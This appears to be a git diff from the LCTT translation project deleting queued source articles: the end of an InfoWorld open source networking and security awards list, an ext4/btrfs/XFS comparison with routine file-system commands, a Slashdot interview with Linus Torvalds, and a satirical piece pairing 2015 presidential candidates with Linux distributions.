-InfoWorld's Best of Open Source Awards for 2015 celebrate more than 100 open source projects, from the bottom of the stack to the top. Follow these links to more open source winners:
-
-[Bossie Awards 2015: The best open source applications][18]
-
-[Bossie Awards 2015: The best open source application development tools][19]
-
-[Bossie Awards 2015: The best open source big data tools][20]
-
-[Bossie Awards 2015: The best open source data center and cloud software][21]
-
-[Bossie Awards 2015: The best open source desktop and mobile software][22]
-
-[Bossie Awards 2015: The best open source networking and security software][23]
-
---------------------------------------------------------------------------------
-
-via: http://www.infoworld.com/article/2982962/open-source-tools/bossie-awards-2015-the-best-open-source-networking-and-security-software.html
-
-作者:[InfoWorld staff][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://www.infoworld.com/author/InfoWorld-staff/
-[1]:https://www.icinga.org/icinga/icinga-2/
-[2]:http://www.zenoss.com/
-[3]:http://www.opennms.org/
-[4]:https://itunes.apple.com/us/app/opennms-compass/id968875097?mt=8
-[5]:https://play.google.com/store/apps/details?id=com.opennms.compass&hl=en
-[6]:http://blog.securityonion.net/p/securityonion.html
-[7]:https://www.kali.org/
-[8]:https://community.rapid7.com/community/metasploit/blog/2015/08/12/metasploit-on-kali-linux-20
-[9]:http://www.openvas.org/
-[10]:http://www.greenbone.net/
-[11]:https://www.owasp.org/index.php/Main_Page
-[12]:https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
-[13]:https://www.owasp.org/index.php/O-Saft
-[14]:https://www.owasp.org/index.php/OWASP_OWTF
-[15]:http://www.beefproject.com/
-[16]:http://www.unhide-forensics.info/
-[17]:http://www.rootkit.nl/projects/rootkit_hunter.html
-[18]:http://www.infoworld.com/article/2982622/bossie-awards-2015-the-best-open-source-applications.html
-[19]:http://www.infoworld.com/article/2982920/bossie-awards-2015-the-best-open-source-application-development-tools.html
-[20]:http://www.infoworld.com/article/2982429/bossie-awards-2015-the-best-open-source-big-data-tools.html
-[21]:http://www.infoworld.com/article/2982923/bossie-awards-2015-the-best-open-source-data-center-and-cloud-software.html
-[22]:http://www.infoworld.com/article/2982630/bossie-awards-2015-the-best-open-source-desktop-and-mobile-software.html
-[23]:http://www.infoworld.com/article/2982962/bossie-awards-2015-the-best-open-source-networking-and-security-software.html
\ No newline at end of file
diff --git a/sources/share/20151204 Review EXT4 vs. Btrfs vs. XFS.md b/sources/share/20151204 Review EXT4 vs. Btrfs vs. XFS.md
deleted file mode 100644
index f6e40d4286..0000000000
--- a/sources/share/20151204 Review EXT4 vs. Btrfs vs. XFS.md
+++ /dev/null
@@ -1,66 +0,0 @@
-Review EXT4 vs. Btrfs vs. XFS
-================================================================================
-![](http://1426826955.rsc.cdn77.org/wp-content/uploads/2015/09/1385698302_funny_linux_wallpapers-593x445.jpg)
-
-To be honest, which file system a PC uses is one of the last things most people think about. Windows and Mac OS X users have even less reason to look, as they really have only one choice for their operating system: NTFS and HFS+, respectively. Linux, on the other hand, offers plenty of file system options, with the widely used ext4 as the current default. However, there is a push to change the default to another file system called btrfs. But what makes btrfs better, what are the other file systems, and when will we see distributions make the change?
-
-Let’s first take a general look at file systems and what they really do, then make a brief comparison of the best-known file systems.
-
-### So, What Do File Systems Do? ###
-
-In case you are unfamiliar with what file systems really do, it is simple enough when summarized. A file system mainly controls how data is stored after a program is no longer using it, how access to that data is controlled, and what other information (metadata) is attached to the data itself. That does not sound like an easy thing to program, and it definitely is not. File systems are continually being revised to include more functionality while becoming more efficient at what they do. So while a file system is a basic need of all computers, it is not quite as basic as it sounds.
-
-### Why Partitioning? ###
-
-Many people have only a vague idea of what partitions are, since every operating system can create and remove them. It can seem strange that Linux uses more than one partition on the same disk, even with the standard installation procedure, so a few words of explanation are in order. One of the main goals of having different partitions is achieving higher data security in case of disaster.
-
-By dividing your hard disk into partitions, data can be grouped and separated. When an accident occurs, only the data stored in the partition that took the hit will be damaged, while the data on other partitions will most likely survive. These principles date from the days when Linux didn’t have a journaled file system and any power failure might have led to disaster.
-
-Partitions also remain useful for security and robustness reasons: a breach in one part of the operating system does not automatically mean the whole computer is at risk. This is currently the most important factor in partitioning. For example, users create scripts, programs, or web applications that start filling up the disk. If that disk contains only one big partition, the entire system may stop functioning when the disk is full. If users store data on separate partitions, then only that data partition is affected, while the system partitions and any other data partitions keep functioning.
-
-Keep in mind that a journaled file system only provides data security in the case of power failure or sudden disconnection of storage devices. It does not protect the data against bad blocks or logical errors in the file system. In such cases, the user should use a Redundant Array of Inexpensive Disks (RAID) solution.
-
-### Why Switch File Systems? ###
-
-The ext4 file system was an improvement over ext3, which was itself an improvement over ext2. While ext4 is a very solid file system and has been the default choice of almost all distributions for the past few years, it is built on an aging code base. Additionally, Linux users are seeking new features that ext4 does not handle on its own. There is software that takes care of some of those needs, but from a performance standpoint, being able to do such things at the file system level could be faster.
-
-### Ext4 File System ###
-
-The limits of ext4 are still impressive. The maximum file size is 16 tebibytes (roughly 17.6 terabytes), which is much bigger than any hard drive a regular consumer can currently buy, while the largest volume/partition you can make with ext4 is 1 exbibyte (roughly 1,152,921.5 terabytes). ext4 brings speed improvements over ext3 through several techniques. Like most modern file systems, it is a journaling file system, meaning it keeps a journal of where files are located on the disk and of any other changes made to the disk. Despite all of its features, it doesn’t support transparent compression, data deduplication, or transparent encryption. Snapshots are technically supported, but the feature is experimental at best.
-
-### Btrfs File System ###
-
-People pronounce btrfs many different ways: Better FS, Butter FS, or B-Tree FS, for example. It is a file system written completely from scratch. btrfs exists because its developers wanted to expand file system functionality to include snapshots, pooling, and checksums, among other things. While it is independent from ext4, it builds on the ideas in ext4 that are great for consumers and businesses alike, and adds features that benefit everybody, but especially enterprises. For enterprises running very large programs with very large databases, a seemingly continuous file system across multiple hard drives can be very beneficial, as it makes consolidation of data much easier. Data deduplication can reduce the actual space data occupies, and data mirroring becomes easier with btrfs as well, since there is a single, broad file system to be mirrored.
-
-Users can certainly still choose to create multiple partitions so that they don’t need to mirror everything. Considering that btrfs can span multiple hard drives, it is a very good thing that it supports 16 times more drive space than ext4: the maximum partition size of a btrfs file system is 16 exbibytes, and the maximum file size is 16 exbibytes too.
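-
-As a sketch of that multi-device pooling with the standard btrfs-progs tools (/dev/sdb and /dev/sdc are hypothetical spare disks; adjust to your hardware before running anything destructive):
-
-    # mkfs.btrfs -d raid1 -m raid1 /dev/sdb /dev/sdc
-    # mount /dev/sdb /mnt/pool
-    # btrfs filesystem show /mnt/pool
-    # btrfs subvolume snapshot /mnt/pool /mnt/pool/snap-1
-
-Either device name mounts the pool, and the snapshot is a cheap copy-on-write clone rather than a full copy.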
-
-### XFS File System ###
-
-The XFS file system is an extension of the extent file system. XFS is a high-performance 64-bit journaling file system. Support for XFS was merged into the Linux kernel around 2002, and in 2009 Red Hat Enterprise Linux 5.4 added support for the XFS file system. XFS supports a maximum file system size of 8 exbibytes for the 64-bit file system. Common criticisms of XFS are that it can’t be shrunk and that it performs poorly when deleting large numbers of files. RHEL 7.0 now uses XFS as its default file system.
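-
-One practical consequence of the no-shrink limitation is that an XFS file system can only be grown in place. A hedged sketch, assuming /data is an XFS mount whose underlying volume has free space:
-
-    # xfs_growfs /data
-    # xfs_info /data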
-
-### Final Thoughts ###
-
-Unfortunately, the arrival date of btrfs as a default is not known. Officially, the next-generation file system is still classified as “unstable”, but if you download the latest version of Ubuntu, you can choose to install onto a btrfs partition. When btrfs will actually be classified as “stable” is still a mystery, but users shouldn’t expect Ubuntu to use btrfs by default until it is indeed considered “stable”. It has been reported that Fedora 18 would use btrfs as its default file system, since a file system checker for btrfs was expected to exist by the time of its release. There is a good amount of work still left for btrfs: not all the features are implemented yet, and performance is a little sluggish compared to ext4.
-
-So, which is better to use? For now, ext4 is the winner, despite nearly identical performance. Why? Convenience and ubiquity. ext4 is still an excellent file system for desktop or workstation use. It is provided by default, so the user can simply install the operating system on it. Also, ext4 supports volumes up to 1 exbibyte and files up to 16 tebibytes in size, so there’s still plenty of room for growth where space is concerned.
-
-btrfs might offer greater volumes, up to 16 exbibytes, and improved fault tolerance, but, for now, it feels more like an add-on file system than one integrated into Linux. For example, the btrfs-tools have to be present before a drive can be formatted with btrfs, which means that btrfs is not an option during Linux installation, though that could vary with the distribution.
-
-Even though transfer rates are important, there’s more to a file system than the speed of file transfers. btrfs has many useful features, such as copy-on-write (CoW), extensive checksums, snapshots, scrubbing, self-healing data, and deduplication, along with many more improvements that ensure data integrity. btrfs lacks the RAID-Z features of ZFS, so RAID is still in an experimental state with btrfs. For pure data storage, however, btrfs is the winner over ext4, but time will tell.
-
-For the moment, ext4 seems to be the better choice on desktop systems, since it is the default file system and is faster than btrfs when transferring files. btrfs is definitely worth looking into, but completely replacing ext4 on desktop Linux may still be a few years away. Data farms and large storage pools could tell a different story and reveal the real differences between ext4, XFS, and btrfs.
-
-If you have a different or additional opinion, kindly let us know by commenting on this article.
-
---------------------------------------------------------------------------------
-
-via: http://www.unixmen.com/review-ext4-vs-btrfs-vs-xfs/
-
-作者:[M.el Khamlichi][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://www.unixmen.com/author/pirat9/
diff --git a/sources/talk/20150709 Interviews--Linus Torvalds Answers Your Question.md b/sources/talk/20150709 Interviews--Linus Torvalds Answers Your Question.md
deleted file mode 100644
index bb04ddf0c8..0000000000
--- a/sources/talk/20150709 Interviews--Linus Torvalds Answers Your Question.md
+++ /dev/null
@@ -1,184 +0,0 @@
-Interviews: Linus Torvalds Answers Your Question
-================================================================================
-Last Thursday you had a chance to [ask Linus Torvalds][1] about programming, hardware, and all things Linux. You can read his answers to those questions below. If you'd like to see what he had to say the last time we sat down with him, [you can do so here][2].
-
-**Productivity**
-by DoofusOfDeath
-
-> You've somehow managed to originate two insanely useful pieces of software: Linux, and Git. Do you think there's anything in your work habits, your approach to choosing projects, etc., that have helped you achieve that level of productivity? Or is it just the traditional combination of talent, effort, and luck?
-
-**Linus**: I'm sure it's pretty much always that "talent, effort and luck". I'll leave it to others to debate how much of each...
-
-I'd love to point out some magical work habit that makes it all happen, but I doubt there really is any. Especially as the work habits I had wrt the kernel and Git have been so different.
-
-With Git, I think it was a lot about coming at a problem with fresh eyes (not having ever really bought into the traditional SCM mindset), and really trying to think about the issues, and spending a fair amount of time thinking about what the real problems were and what I wanted the design to be. And then the initial self-hosting code took about a day to write (ok, that was "self-hosting" in only the weakest sense, but still).
-
-And with Linux, obviously, things were very different - the big designs came from the outside, and it took half a year to host itself, and it hadn't even started out as a kernel to begin with. Clearly not a lot of thinking ahead and planning involved ;). So very different circumstances indeed.
-
-What both the kernel and Git have, and what I think is really important (and I guess that counts as a "work habit"), is a maintainer that stuck to it, and was responsive, responsible and sane. Too many projects falter because they don't have people that stick with them, or have people who have an agenda that doesn't match reality or the user expectations.
-
-But it's very important to point out that for Git, that maintainer was not me. Junio Hamano really should get pretty much all the credit for Git. Credit where credit is due. I'll take credit for the initial implementation and design of Git - it may not be perfect, but ten years on it still is very solid and very clearly the same basic design. But I'll take even _more_ credit for recognizing that Junio had his head screwed on right, and was the person to drive the project. And all the rest of the credit goes to him.
-
-Of course, that kind of segues into something else the kernel and Git do have in common: while I still maintain the kernel, I did end up finding a lot of smart people to maintain all the different parts of it. So while one important work habit is that "stick to it" persistence that you need to really take a project from a not-quite-usable prototype to something bigger and better, another important work-habit is probably to also "let go" and not try to own and control the project too much. Let other people really help you - guide the process but don't get in their way.
-
-**init system**
-by lorinc
-
-> There wasn't a decent unix-like kernel, you wrote one which ultimately became the most used. There wasn't decent version control software, you wrote one which ultimately became the most loved. Do you think we already have a decent init system, or do you have plan to write one that will ultimately settle the world on that hot topic?
-
-**Linus**: You can say the word "systemd". It's not a four-letter word. Seven letters. Count them.
-
-I have to say, I don't really get the hatred of systemd. I think it improves a lot on the state of init, and no, I don't see myself getting into that whole area.
-
-Yeah, it may have a few odd corners here and there, and I'm sure you'll find things to despise. That happens in every project. I'm not a huge fan of the binary logging, for example. But that's just an example. I much prefer systemd's infrastructure for starting services over traditional init, and I think that's a much bigger design decision.
-
-Yeah, I've had some personality issues with some of the maintainers, but that's about how you handle bug reports and accept blame (or not) for when things go wrong. If people thought that meant that I dislike systemd, I will have to disappoint you guys.
-
-**Can Valve change the Linux gaming market?**
-by Anonymous Coward
-
-> Do you think Valve is capable of making Linux a primary choice for gamers?
-
-**Linus**: "Primary"? Probably not where it's even aiming. I think consoles (and all those handheld and various mobile platforms that "real gamers" seem to dismiss as toys) are likely much more primary, and will stay so.
-
-I think Valve wants to make sure they can control their own future, and Linux and ValveOS is probably partly to explore a more "console-like" Valve experience (ie the whole "get a box set up for a single main purpose", as opposed to a more PC-like experience), and partly as a "second source" against Microsoft, who is a competitor in the console area. Keeping your infrastructure suppliers honest by making sure you have alternatives sounds like a good strategy, and particularly so when those suppliers may be competing with you directly elsewhere.
-
-So I don't think the aim is really "primary". "Solid alternative" is I think the aim. Of course, let's see where it goes after that.
-
-But I really have not been involved. People like Greg and the actual graphics driver guys have been in much more direct contact with Valve. I think it's great to see gaming on Linux, but at the same time, I'm personally not really much of a gamer.
-
-**The future of RT-Linux?**
-by nurhussein
-
-> According to Thomas Gleixner, [the future of the realtime patchset to Linux is in doubt][3], as it is difficult to secure funding from interested parties on this functionality even though it is both useful and important: What are your thoughts on this, and what do you think we need to do to get more support behind the RT patchset, especially considering Linux's increasing use in embedded systems where realtime functionality is undoubtedly useful?
-
-**Linus**: So I think this is one of those things where the markets decide how important rtLinux ends up being, and I suspect there are more than enough companies who end up wanting and using rtLinux that the project isn't really going anywhere. The complaints by Thomas were - I think - a wake-up call to the companies who end up wanting the extended hard realtime patches.
-
-So I suspect there are companies and groups like OSADL that end up funding and helping with rtLinux, and that it isn't going away.
-
-**Rigor and developments**
-by hcs_$reboot
-
-> The most complex program running on a machine is arguably its OS, especially the kernel. Linux (kernel) reached the top level in terms of performance, reliability and versatility. You have been criticized quite a few times for some virulent mails addressed to developers. Do you think Linux would be where it is without managing the project with an iron fist? To go further, do you think some other main OSS project would benefit from a more rigorous management approach?
-
-**Linus**: One of the nice things about open source is how it allows people to really concentrate on what they are good at, and it has been a huge advantage for Linux that we've had people who are interested in the marketing side and selling Linux, as well as the legal side etc.
-
-And that is all in addition, of course, to the original "we're motivated by the technology" people like me. And even within that "we're motivated by technology" group, you most certainly don't need to find _everything_ interesting, you can find the area you are passionate about and really care about and want to work on.
-
-That's _fundamentally_ how open source works.
-
-Now, if somebody is passionate about some "good management" thing, go wild, and try to get involved, and try to manage things. It's not what _I_ am interested in, but hey, the proof is in the pudding - anybody who thinks they have a new rigorous management approach that they think will help some part of the process, go wild.
-
-Now, I personally suspect that it wouldn't work - not only are tech people an ornery lot to begin with (that whole "herding cats" thing), just look at all the crazy arguments on the internet. And ask yourself what actually holds an open source project like the kernel together? I think you need to be very oriented towards the purely technical solutions, simply because then you have tangible and real issues you can discuss (and argue about) with fairly clear-cut hard answers. It's the only thing people can really agree on in the big picture.
-
-So the Linux approach to "management" has been to put technology first. That's rigorous enough for me. But as mentioned, it's a free-for-all. Anybody can come in and try to do better. Really.
-
-And btw, it's worth noting that there are obviously specific smaller development teams where other management models work fine. Most of the individual developers are parts of teams inside particular companies, and within the confines of that company, there may well be a very strict rigorous management model. Similarly, within the confines of a particular productization effort there may be particular goals and models for that particular team that transcend that general "technical issues" thing.
-
-Just to give a concrete example, the "development kernel" tree that I maintain works fundamentally differently and with very different rules from the "stable tree" that Greg does, which in turn is maintained very differently from what a distribution team within a Linux company does inside its maintenance kernel team.
-
-So there's certainly room for different approaches to managing those very different groups. But do I think you can "rigorously manage" people on the internet? No.
-
-**Functional languages?**
-by EmeraldBot
-
-> While historically you've been a C and Assembly guy (and the odd shell scripting and such), what do you think of functional languages such as Lisp, Clojure, Haskell, etc? Do you see any advantages to them, or do you view them as frivolous and impractical? If you decide to do so, thanks for taking the time to answer my question! You're a legend at what you do, and I think it's awesome that the significantly less interesting me can ask you a question like this.
-
-**Linus**: I may be a fan of C (with a certain fondness for assembly, just because it's so close to the machine), but that's very much about a certain context. I work at a level where those languages make sense. I certainly don't think that tools like Haskell etc are "frivolous and impractical" in general, although on a kernel level (or in a source control management system) I suspect they kind of are.
-
-Many moons ago I worked on sparse (the C parser and analyzer), and one of my coworkers was a Haskell fan, and did incredible example transformations in very simple (well, to him) code - stuff that is just nasty to write in C because it's pretty high-level, there's tons of memory management, and you're really talking about implementing fairly abstract and high-level rules with pattern matching etc.
-
-So I'm definitely not a functional language kind of guy - it's not how I learnt programming, and it really isn't very relevant to what I do, and I wouldn't recognize Haskell code if it bit me in the ass and called me names. But no, I wouldn't call them frivolous.
-
-**Critical software to the use of Linux**
-by TWX
-
-> Mr. Torvalds, For many uses of Linux such as on the desktop, other software beyond the kernel and the base GNU tools are required. What other projects would you like to see given priority, and what would you like to see implemented or improved? Admittedly I thought most about X-Windows when asking this question; but I don't doubt that other daemons or systems can be just as important to the user experience. Thank you for your efforts all these years.
-
-**Linus**: Hey, I don't really have any particular project I would want to champion, largely because we all have so different requirements on the desktop. There's just no single thing that stands out as being hugely more important than others to me.
-
-What I do wish particularly desktop developers cared about is "consistency of experience". And by that I don't mean some kind of enforced visual consistency between different applications to make things "look coherent". No, I'm just talking about the pain and uncertainty users go through with upgrades, and understanding that while your project may be the most important project to *you* (because it's what you do), to your users, your project is likely just a fairly small and irrelevant part of their experience, and it's not very central at all, and they've learnt the quirks about that thing they don't even care about, and you really shouldn't break their expectations. Because it turns out that that is how you really make people hate their desktop.
-
-This is not at all Linux-specific, of course - just look at the less than enthusiastic reception that other operating system redesigns have received. But I really wish that we hadn't had *both* of the major Linux desktop environments have to learn this (well, I hope they learnt) the hard way, and both of them ending up blaming their users rather than themselves.
-
-**"anykernel"-style portable drivers?**
-by staalmannen
-
-> What do you think about the "anykernel" concept (invented by another Finn btw) used in NetBSD? Basically, they have modularized the code so that a driver can be built either in a monolithic kernel or for user space without source code changes ( rumpkernel.org ). The drivers are highly portable and used in Genode os (L4 type kernels), minix etc... Would this be possible or desirable for Linux? Apparently there is one attempt called "libos"...
-
-**Linus**: So I have bad experiences with "portable" drivers. Writing drivers to some common environment tends to force some ridiculously nasty impedance matching abstractions that just get in the way and make things really hard to read and modify. It gets particularly nasty when everybody ends up having complicated - and differently so - driver subsystems to handle a lot of commonalities for a certain class of drivers (say a network driver, or a USB driver), and the different operating systems really have very different approaches and locking rules etc.
-
-I haven't seen anykernel drivers, but from past experience my reaction to "portable device drivers" is to run away, screaming like a little girl. As they say in Swedish "Bränt barn luktar illa".
-
-**Processor Architecture**
-by swv3752
-
-> Several years ago, you were employed by Transmeta designing the Crusoe processor. I understand you are quite knowledgeable about cpu architecture. What are your thoughts on the Current Intel and AMD x86 CPUs particularly in comparison with ARM and IBM's Power8 CPUs? Where do you see the advantages of each one?
-
-**Linus**: I'm no CPU architect, I just play one on TV.
-
-But yes, I've been close to the CPU both as part of my kernel work, and as part of a processor company, and working at that level for a long time just means that you end up having fairly strong opinions. One of the things that my experiences at Transmeta convinced me of, for example, was that there's definitely very much a limit to what software should care about. I loved working at Transmeta, I loved the whole startup company environment, I loved working with really smart people, but in the end I ended up absolutely *not* loving to work with overly simple hardware (I also didn't love the whole IPO process, and what that did to the company culture, but that's a different thing).
-
-Because there's only so much that software can do to compensate.
-
-Something similar happened with my kernel work on the alpha architecture, which also started out as being an overly simplified implementation in the name of being small and supposedly running really fast. While I really started out liking the alpha architecture for being so clean, I ended up detesting how fragile the architecture implementations were (and by the time that got fixed in the 21264, I had given up on alpha).
-
-So I've come to absolutely detest CPU's that need a lot of compiler smarts or special tuning to go fast. Life is too short to waste on in-order CPU's, or on hardware designers who think software should take care of the pieces that they find to be too complicated to handle themselves, and as a result just left undone. "Weak memory ordering" is just another example.
-
-Thankfully, most of the industry these days seems to agree. Yes, there are still in-order cores, but nobody tries to make excuses for them any more: they are for the truly cheap and low-end market.
-
-I tend to really like the modern Intel cores in particular, which tend to take that "let's not be stupid" really to heart. With the kernel being so threaded, I end up caring a lot about things like memory ordering etc, and the Intel big-core CPU's tend to be in a class of their own there. As a software person who cares about performance and looks at instruction profiles etc, it's just so *nice* to see that the CPU doesn't have some crazy glass jaw where you have to be very careful.
-
-**GPU kernels**
-by maraist
-
-> Is there any inspiration that a GPU-based kernel/scheduler holds for you? How might Linux be improved to better take advantage of GPU-type batch execution models, given that you worked at Transmeta on JIT-compiled host-targeted runtimes? GPUs' 1,000-thread schedulers seem like the next great paradigm for the exact type of machines that Linux does best on.
-
-**Linus**: I don't think we'll see the kernel ever treat GPU threads the way we treat CPU threads. Not with the current model of GPU's (and that model doesn't really seem to be changing all that much any more).
-
-Yes, GPU's are getting much better, and now generally have virtual memory and the ability to preempt execution, and you could run an OS on them. But the scheduling latencies are pretty high, and the threads are not really "independent" (ie they tend to share a lot of state - like the virtual address space and a large shared register set), so GPU "threads" don't tend to work like CPU threads. You'd schedule them all-or-nothing, so if you were to switch processes, you'd treat the GPU as one entity where you switch all the threads at once.
-
-So it really wouldn't look like a thousand threads to the kernel. The GPU would still be scheduled as one single entity (or maybe a couple of entities depending on how the GPU is partitioned). The fact that that single entity works by doing a lot of things in massive parallelism is kind of immaterial for the kernel that doesn't end up seeing that parallelism as separate threads.
-
-**alleged danger of Artificial Intelligence**
-by peter303
-
-> Some computer experts like Marvin Minsky, Larry Page, Ray Kurzweil think A.I. will be a great gift to Mankind. Others like Bill Joy and Elon Musk are fearful of potential danger. Where do you stand, Linus?
-
-**Linus**: I just don't see the thing to be fearful of.
-
-We'll get AI, and it will almost certainly be through something very much like recurrent neural networks. And the thing is, since that kind of AI will need training, it won't be "reliable" in the traditional computer sense. It's not the old rule-based prolog days, when people thought they'd *understand* what the actual decisions were in an AI.
-
-And that all makes it very interesting, of course, but it also makes it hard to productize. Which will very much limit where you'll actually find those neural networks, and what kinds of network sizes and inputs and outputs they'll have.
-
-So I'd expect just more of (and much fancier) rather targeted AI, rather than anything human-like at all. Language recognition, pattern recognition, things like that. I just don't see the situation where you suddenly have some existential crisis because your dishwasher is starting to discuss Sartre with you.
-
-The whole "Singularity" kind of event? Yeah, it's science fiction, and not very good SciFi at that, in my opinion. Unending exponential growth? What drugs are those people on? I mean, really..
-
-It's like Moore's law - yeah, it's very impressive when something can (almost) be plotted on an exponential curve for a long time. Very impressive indeed when it's over many decades. But it's _still_ just the beginning of the "S curve". Anybody who thinks any different is just deluding themselves. There are no unending exponentials.
-
-**Is the kernel basically a finished project?**
-by NaCh0
-
-> Aside from adding drivers and refactoring algorithms when performance limits are discovered, is there anything left for the kernel? Maybe it's a failure of tech journalism but we never hear about the next big thing in kernel land anymore.
-
-**Linus**: I don't think there's much of a "next big thing" in the kernel.
-
-I wouldn't say that there is nothing but drivers (and architectures are kind of "CPU drivers") and improving scalability left, because I'm constantly amazed by how many new things people figure out are still good ideas. But they tend to still be pretty incremental improvements. An OS kernel doesn't look *that* radically different from what it was 40 years ago, and that's fine. I think radical new ideas are often overrated, and the thing that really matters in the end is that plodding detail work. That's how technology evolves.
-
-And judging by how our kernel releases are going, there's no end in sight for that "plodding detail work". And it's still as interesting as it ever was.
-
---------------------------------------------------------------------------------
-
-via: http://linux.slashdot.org/story/15/06/30/0058243/interviews-linus-torvalds-answers-your-question
-
-作者:[samzenpus][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:samzenpus@slashdot.org
-[1]:http://interviews.slashdot.org/story/15/06/24/1718247/interview-ask-linus-torvalds-a-question
-[2]:http://meta.slashdot.org/story/12/10/11/0030249/linus-torvalds-answers-your-questions
-[3]:https://lwn.net/Articles/604695/
diff --git a/sources/talk/20150806 Torvalds 2.0--Patricia Torvalds on computing college feminism and increasing diversity in tech.md b/sources/talk/20150806 Torvalds 2.0--Patricia Torvalds on computing college feminism and increasing diversity in tech.md
index 36f5642c10..10a30119e1 100644
--- a/sources/talk/20150806 Torvalds 2.0--Patricia Torvalds on computing college feminism and increasing diversity in tech.md
+++ b/sources/talk/20150806 Torvalds 2.0--Patricia Torvalds on computing college feminism and increasing diversity in tech.md
@@ -78,4 +78,4 @@ via: http://opensource.com/life/15/8/patricia-torvalds-interview
[4]:https://www.facebook.com/guerrillafeminism
[5]:https://modelviewculture.com/
[6]:https://www.aspirations.org/
-[7]:https://www.facebook.com/groups/LadiesStormHackathons/
\ No newline at end of file
+[7]:https://www.facebook.com/groups/LadiesStormHackathons/
diff --git a/sources/talk/20150820 Which Open Source Linux Distributions Would Presidential Hopefuls Run.md b/sources/talk/20150820 Which Open Source Linux Distributions Would Presidential Hopefuls Run.md
deleted file mode 100644
index 2a850a7468..0000000000
--- a/sources/talk/20150820 Which Open Source Linux Distributions Would Presidential Hopefuls Run.md
+++ /dev/null
@@ -1,53 +0,0 @@
-Which Open Source Linux Distributions Would Presidential Hopefuls Run?
-================================================================================
-![Republican presidential candidate Donald Trump
-](http://thevarguy.com/site-files/thevarguy.com/files/imagecache/medium_img/uploads/2015/08/donaldtrump.jpg)
-
-Republican presidential candidate Donald Trump
-
-If people running for president used Linux or another open source operating system, which distribution would it be? That's a key question that the rest of the press—distracted by issues of questionable relevance such as "policy platforms" and whether it's appropriate to add an exclamation point to one's Christian name—has been ignoring. But the ignorance ends here: Read on for this sometime-journalist's take on presidential elections and Linux distributions.
-
-If this sounds like a familiar topic to those of you who have been reading my drivel for years (is anyone, other than my dear editor, unfortunate enough to have actually done that?), it's because I wrote a [similar post][1] during the last presidential election cycle. Some kind readers took that article more seriously than I intended, so I'll take a moment to point out that I don't actually believe that open source software and political campaigns have anything meaningful to do with one another. I am just trying to amuse myself at the start of a new week.
-
-But you can make of this what you will. You're the reader, after all.
-
-### Linux Distributions of Choice: Republicans ###
-
-Today, I'll cover just the Republicans. And I won't even discuss all of them, since the candidates hoping for the Republican party's nomination are too numerous to cover fully here in one post. But for starters:
-
-If **Jeb (Jeb!?) Bush** ran Linux, it would be [Debian][2]. It's a relatively boring distribution designed for serious, grown-up hackers—the kind who see it as their mission to be the adults in the pack and clean up the messes that less-experienced open source fans create. Of course, this also makes Debian relatively unexciting, and its user base remains perennially small as a result.
-
-**Scott Walker**, for his part, would be a [Damn Small Linux][3] (DSL) user. Requiring merely 50MB of disk space and 16MB of RAM to run, DSL can breathe new life into 20-year-old 486 computers—which is exactly what a cost-cutting guru like Walker would want. Of course, the user experience you get from DSL is damn primitive; the platform barely runs a browser. But at least you won't be wasting money on new computer hardware when the stuff you bought in 1993 can still serve you perfectly well.
-
-How about **Chris Christie**? He'd obviously be clinging to [Relax-and-Recover Linux][4], which bills itself as a "setup-and-forget Linux bare metal disaster recovery solution." "Setup-and-forget" has basically been Christie's political strategy ever since that unfortunate incident on the George Washington Bridge stymied his political momentum. Disaster recovery may or may not bring back everything for Christie in the end, but at least he might succeed in recovering a confidential email or two that accidentally disappeared when his computer crashed.
-
-As for **Carly Fiorina**, she'd no doubt be using software developed for "[The Machine][5]" operating system from [Hewlett-Packard][6] (HPQ), the company she led from 1999 to 2005. The Machine actually may run several different operating systems, which may or may not be based on Linux—details remain unclear—and its development began well after Fiorina's tenure at HP came to a conclusion. Still, her roots as a successful executive in the IT world form an important part of her profile today, meaning that her ties to HP have hardly been severed fully.
-
-Last but not least—and you knew this was coming—there's **Donald Trump**. He'd most likely pay a team of elite hackers millions of dollars to custom-build an operating system just for him—even though he could obtain a perfectly good, ready-made operating system for free—to show off how much money he has to waste. He'd then brag about it being the best operating system ever made, though it would of course not be compliant with POSIX or anything else, because that would mean catering to the establishment. The platform would also be totally undocumented, since, if Trump explained how his operating system actually worked, he'd risk giving away all his secrets to the Islamic State—obviously.
-
-Alternatively, if Trump had to go with a Linux platform already out there, [Ubuntu][7] seems like the most obvious choice. Like Trump, the Ubuntu developers have taken a we-do-what-we-want approach to building open source software by implementing their own, sometimes proprietary applications and interfaces. Free-software purists hate Ubuntu for that, but plenty of ordinary people like it a lot. Of course, whether playing purely by your own rules—in the realms of either software or politics—is sustainable in the long run remains to be seen.
-
-### Stay Tuned ###
-
-If you're wondering why I haven't yet mentioned the Democratic candidates, worry not. I am not leaving them out of today's writing because I like them any more or less than the Republicans. (Personally, I think the peculiar American practice of having only two viable political parties—which virtually no other functioning democracy does—is ridiculous, and I am suspicious of all of these candidates as a result.)
-
-On the contrary, there's plenty to say about the Linux distributions the Democrats might use, too. And I will, in a future post. Stay tuned.
-
---------------------------------------------------------------------------------
-
-via: http://thevarguy.com/open-source-application-software-companies/081715/which-open-source-linux-distributions-would-presidential-
-
-作者:[Christopher Tozzi][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://thevarguy.com/author/christopher-tozzi
-[1]:http://thevarguy.com/open-source-application-software-companies/aligning-linux-distributions-presidential-hopefuls
-[2]:http://debian.org/
-[3]:http://www.damnsmalllinux.org/
-[4]:http://relax-and-recover.org/
-[5]:http://thevarguy.com/open-source-application-software-companies/061614/hps-machine-open-source-os-truly-revolutionary
-[6]:http://hp.com/
-[7]:http://ubuntu.com/
\ No newline at end of file
diff --git a/sources/talk/20151019 Gaming On Linux--All You Need To Know.md b/sources/talk/20151019 Gaming On Linux--All You Need To Know.md
